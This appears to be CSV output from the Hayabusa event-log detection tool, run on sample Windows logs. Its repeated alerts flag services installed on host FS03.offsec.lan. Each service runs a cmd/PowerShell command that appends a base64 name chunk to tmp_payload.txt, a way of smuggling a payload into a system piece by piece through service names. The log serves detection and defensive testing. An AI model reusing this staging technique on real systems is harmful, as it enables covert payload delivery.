2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
